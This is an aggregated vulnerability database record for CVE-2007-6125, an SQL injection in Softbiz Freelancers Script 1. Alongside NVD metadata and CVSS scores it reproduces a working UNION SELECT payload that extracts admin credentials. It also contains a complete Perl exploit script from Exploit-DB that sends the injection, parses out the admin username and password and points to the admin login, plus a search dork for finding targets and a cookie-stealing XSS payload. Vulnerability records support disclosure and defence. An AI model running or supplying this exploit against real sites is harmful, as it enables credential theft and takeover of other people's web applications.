ID CVE-2007-6125Type cveReporter NVDModified 2017-09-28T21:29:49
Description
SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.
{"id": "CVE-2007-6125", "bulletinFamily": "NVD", "title": "CVE-2007-6125", "description": "SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.", "published": "2007-11-26T17:46:00", "modified": "2017-09-28T21:29:49", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6125", "reporter": "NVD", "references": ["https://www.exploit-db.com/exploits/4660", "http://www.securityfocus.com/bid/26569", "https://exchange.xforce.ibmcloud.com/vulnerabilities/38616"], "cvelist": ["CVE-2007-6125"], "type": "cve", "lastseen": "2017-09-29T14:25:36", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:softbiz:freelancers_script:1.0"], "cvelist": ["CVE-2007-6125"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.", "edition": 1, "enchantments": {}, "hash": "4261832e937be7ebb6e281570dcbc5044fedb54ba3e8d357509bc5874e860940", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6dac0f1cbf6008232b5a0ce7eafde552", "key": "cvelist"}, {"hash": "61ba258ee42cbadc1266631ed6f33750", "key": "references"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "d28f1d2e71675d1894b520d9838d933e", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "be9f77574bd22e71aa31f7389439f0ed", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a2204f98994661b98216365610b9bcf2", "key": "modified"}, {"hash": "ca45ad0097ff3ff00f6daa168f059a16", "key": "cpe"}, {"hash": "dc0ad33e47751e68c41524336959db8c", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "263762668541ff93ca9d4fcbb89d4410", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6125", "id": "CVE-2007-6125", "lastseen": "2016-09-03T09:48:01", "modified": "2008-11-15T02:03:25", "objectVersion": "1.2", "published": "2007-11-26T17:46:00", "references": ["http://www.securityfocus.com/bid/26569", "http://xforce.iss.net/xforce/xfdb/38616", "http://www.milw0rm.com/exploits/4660"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-6125", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T09:48:01"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:softbiz:freelancers_script:1.0"], "cvelist": ["CVE-2007-6125"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.", "edition": 2, "enchantments": {}, "hash": "94d0f2180812c7f9fb7d7fbe62030e032765e954e19077b16548e81400be7008", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "476391587d97da1a52fd703eb2795289", "key": "modified"}, {"hash": "85f91f8bd04be101e31b49d9ddc170b6", "key": "references"}, {"hash": "6dac0f1cbf6008232b5a0ce7eafde552", "key": "cvelist"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "d28f1d2e71675d1894b520d9838d933e", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "be9f77574bd22e71aa31f7389439f0ed", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ca45ad0097ff3ff00f6daa168f059a16", "key": "cpe"}, {"hash": "dc0ad33e47751e68c41524336959db8c", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "263762668541ff93ca9d4fcbb89d4410", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6125", "id": "CVE-2007-6125", "lastseen": "2017-07-29T11:22:22", "modified": "2017-07-28T21:34:02", "objectVersion": "1.3", "published": "2007-11-26T17:46:00", "references": ["http://www.securityfocus.com/bid/26569", "https://exchange.xforce.ibmcloud.com/vulnerabilities/38616", "http://www.milw0rm.com/exploits/4660"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-6125", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-29T11:22:22"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "ca45ad0097ff3ff00f6daa168f059a16"}, {"key": "cvelist", "hash": "6dac0f1cbf6008232b5a0ce7eafde552"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "be9f77574bd22e71aa31f7389439f0ed"}, {"key": "href", "hash": "263762668541ff93ca9d4fcbb89d4410"}, {"key": "modified", "hash": "e8ebc8d46ae302c93cc1d44ca919a80a"}, {"key": "published", "hash": "dc0ad33e47751e68c41524336959db8c"}, {"key": "references", "hash": "0862f4bbdd6868de56727fc75ebfc988"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "d28f1d2e71675d1894b520d9838d933e"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b906e36d1b1f006f6efc04609f9a2c8eb6fd11ebe27e3fe7ed4808f728ca6841", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-09-29T14:25:36"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:softbiz:freelancers_script:1.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"osvdb": [{"lastseen": "2017-04-28T13:20:34", "references": [], "description": "## Manual Testing Notes\nsearch_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*\n## References:\n[Secunia Advisory ID:27808](https://secuniaresearch.flexerasoftware.com/advisories/27808/)\n[Related OSVDB ID: 38907](https://vulners.com/osvdb/OSVDB:38907)\nOther Advisory URL: http://milw0rm.com/exploits/4660\nISS X-Force ID: 38616\n[CVE-2007-6125](https://vulners.com/cve/CVE-2007-6125)\nBugtraq ID: 26569\n", "edition": 1, "reporter": "OSVDB", "published": "2007-11-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Softbiz Freelancers Script search_form.php sb_protype Variable SQL Injection", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-6125"], "modified": "2007-11-25T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38908", "id": "OSVDB:38908", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T21:28:00", "osvdbidlist": ["38908", "38907"], "references": [], "edition": 1, "description": "Softbiz Freelancers Script v.1 Remote SQL Injection Exploit. CVE-2007-6124,CVE-2007-6125. Webapps exploit for php platform", "reporter": "Khashayar Fereidani", "published": "2007-11-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "Softbiz Freelancers Script 1 - Remote SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-6124", "CVE-2007-6125"], "modified": "2007-11-25T00:00:00", "id": "EDB-ID:4660", "href": "https://www.exploit-db.com/exploits/4660/", "sourceData": "#!/usr/bin/perl\n#####################################################################################\n#### Softbiz Freelancers Script V.1 ####\n#### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) ####\n#####################################################################################\n# #\n#AUTHOR : IRCRASH (Dr.Crash) #\n#Script Download : http://www.softbizscripts.com/ #\n#DORK: \"Search Projects\" intitle:\"The ultimate project website\" #\n#Our English Forum : http://ircrash.com/english/ #\n# #\n#####################################################################################\n# < XSS > #\n#XSS Address : http://Sitename/signin.php?errmsg=<script>alert(document.cookie);</script>\n# #\n#####################################################################################\n# < SQL > #\n#SQL Address : search_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*\n# #\n#####################################################################################\n# Our site : Http://IRCRASH.COM #\n#####################################################################################\n \n \nuse LWP;\nuse HTTP::Request;\nuse Getopt::Long;\n \n \nsub header\n{\nprint \"\n****************************************************\n* Softbiz Freelancers Script Sql Injection exploit *\n****************************************************\n*AUTHOR : IRCRASH (Dr.Crash) *\n*Exploited by : Dr.Crash *\n*Our Site : IRCRASH.COM *\n****************************************************\";\n}\n \nsub usage\n{\n print \"\n* Usage : perl $0 -url http://Sitename/\n****************************************************\n\";\n} \n \n \nmy %parameter = ();\nGetOptions(\\%parameter, \"url=s\");\n \n$url = $parameter{\"url\"};\n \nif(!$url)\n{\nheader();\nusage();\nexit;\n}\n \nif($url !~ /\\//){$url = $url.\"/\";}\nif($url !~ /http:\\/\\//){$url = \"http://\".$url;}\n \nif(!$cat){$cat = 2;}\n$bugfile = \"/search_form.php?\";\n$sqlinjection = \"999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*\";\n$poststring = \"sb_showresult=1&sb_protype=\".$sqlinjection;\n \n \n \nsub Exploit()\n{\n$requestpage = $url.$bugfile;\nprint \"Requesting Page is \".$requestpage.\"\\n\";\n \nmy $req = HTTP::Request->new(\"POST\",$requestpage);\n$ua = LWP::UserAgent->new;\n$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );\n#$req->referer($url);\n$req->referer(\"http://IRCRASH.COM\");\n$req->content_type('application/x-www-form-urlencoded');\n$contlen = length($poststring);\n$req->header(\"content-length\" => $contlen);\n$req->content($poststring);\n \n$response = $ua->request($req);\n$content = $response->content;\n$header = $response->headers_as_string();\n \n#Debug Modus delete # at beginning of next line\n#print $content;\n \n@name = split(/Login:/,$content);\n$name = @name[1];\n@name = split(/<hey exploit>/,$name);\n$name = @name[0];\n \n@password = split(/Password:/,$content);\n$password = @password[1];\n@password = split(/<hey exploit>/,$password);\n$password = @password[0];\n \nif(!$name && !$password)\n{\nprint \"\\n\\n\";\nprint \"!Exploit failed ! :( - Insert http:// in start of url address\\n\\n\";\nexit;\n}\n \nprint \"Username: \".$name.\"\\n\";\nprint \"Password: \" .$password.\"\\n\\n\";\nprint \"You can login in .$url/admin/\\n\";\nprint \"Enjoy My friend .....\\n\";\n \n}\n \n#Starting;\nprint \"\\n\\nExploiting...\\n\";\nExploit();\n\n# milw0rm.com [2007-11-25]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4660/"}]}
